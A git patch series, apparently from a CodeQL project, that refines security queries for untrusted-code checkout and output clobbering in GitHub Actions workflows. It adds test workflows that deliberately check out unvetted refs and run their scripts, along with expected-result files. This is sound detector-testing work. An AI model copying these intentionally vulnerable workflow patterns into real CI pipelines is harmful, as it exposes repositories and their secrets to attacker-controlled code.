.github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 42d4bb577c84d021f2cca923552f647f9288ff0f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:11 +0200 Subject: [PATCH 608/707] Better identification of checkout of untrusted code depending on the triggering events --- .../codeql/actions/dataflow/FlowSources.qll | 6 +- .../security/OutputClobberingQuery.qll | 3 +- .../actions/security/PoisonableSteps.qll | 7 +- .../security/UntrustedCheckoutQuery.qll | 227 ++++++++---------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../CWE-829/.github/workflows/test21.yml | 27 +++ .../CWE-829/.github/workflows/test22.yml | 62 +++++ .../CWE-829/.github/workflows/test23.yml | 47 ++++ .../UntrustedCheckoutCritical.expected | 3 + .../CWE-829/UntrustedCheckoutHigh.expected | 4 - .../CWE-829/UntrustedCheckoutMedium.expected | 7 - 11 files changed, 250 insertions(+), 144 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 56c901434ce0..e0d46c7196d5 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -90,7 +90,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -237,7 +238,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { this.asExpr() = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 311c3abdb691..5850aa91e6e1 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -29,7 +29,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 99d844bae79e..d446c4466410 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -17,12 +17,13 @@ class PoisonableCommandStep extends PoisonableStep, Run { class JavascriptImportUsesStep extends PoisonableStep, UsesStep { JavascriptImportUsesStep() { - exists(string script, string line, string import_stmt | + exists(string script, string line | this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and - import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and - import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + // const script = require('${{ github.workspace }}/scripts/test.js'); + // await script({ github, context, core }); + line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 336afdc73b15..621f4b80e1f0 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -3,49 +3,57 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + /** * A taint-tracking configuration for PR HEAD references flowing * into actions/checkout's ref argument. */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - // remote flow sources - source instanceof ArtifactSource - or - source instanceof GitHubCtxSource - or - source instanceof GitHubEventCtxSource - or - source instanceof GitHubEventJsonSource - or - source instanceof MaDSource - or - // `ref` argument contains the PR id/number or head ref - exists(Expression e | - source.asExpr() = e and - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) + source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + ( + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) ) - ) - or - // 3rd party actions returning the PR head ref - exists(StepsExpression e, UsesStep step | - source.asExpr() = e and - e.getStepId() = step.getId() and - ( - step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" - or - step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "potiuk/get-workflow-origin" and - e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] - or - step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) ) ) } @@ -71,27 +79,32 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global> $GITHUB_OUTPUT + if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i patch) + else + if [[ $OLD_VERSION == *"rc"* ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease) + else + # WordPress version guidelines: If minor is 9, bump major instead. + IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION" + if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then + NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1" + else + NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1" + fi + fi + fi + echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT + IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION" + RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}" + echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT + + build: + runs-on: ubuntu-latest + needs: bump-version + if: | + always() && ( + github.event_name == 'pull_request' || + github.event_name == 'workflow_dispatch' || + github.repository == 'test/test' + ) + steps: + - name: Checkout code + uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} + + - run: ./bin/build-plugin-zip.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml new file mode 100644 index 000000000000..da889dd2ac6f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml @@ -0,0 +1,47 @@ +on: + schedule: + - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC + workflow_dispatch: + inputs: + pr: + description: "PR Number" + required: false + type: number + release: + types: [ published ] + +jobs: + resolve-required-data: + name: Resolve Required Data + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + outputs: + ref: ${{ steps.script.outputs.ref }} + steps: + - name: Resolve and set checkout and version data to use for release + id: script + uses: actions/github-script@v7 + env: + PR_NUMBER: ${{ github.event.inputs.pr }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js'); + await script({ github, context, core }); + + build: + needs: [ resolve-required-data ] + if: ${{ github.repository_owner == 'test' }} + name: stable + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ needs.resolve-required-data.outputs.repo }} + ref: ${{ needs.resolve-required-data.outputs.ref }} + + - name: Build + shell: bash + run: | + ./cmd + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 237928fc8927..339cd5f6cf40 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -267,6 +267,9 @@ edges | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | | .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 13e16280c33d..1d6122b37479 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index c81666f72dc2..a476bdc22d8a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,13 +1,6 @@ -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 0cacb6feaffba0b5317ecb3829d657b3ba89371b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:51 +0200 Subject: [PATCH 609/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 867f1bfdb862..404c86d212cc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.71 +version: 0.1.72 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index df650d0e242e..1296bbd667b1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.71 +version: 0.1.72 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0738a66380d8f781114441348d0713c090c30d5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:37:01 +0200 Subject: [PATCH 610/707] Add trigger event checks for all checkout models --- .../security/UntrustedCheckoutQuery.qll | 4 + .../CWE-829/.github/workflows/test24.yml | 20 + .../CWE-829/UntrustedCheckoutCritical.actual | 342 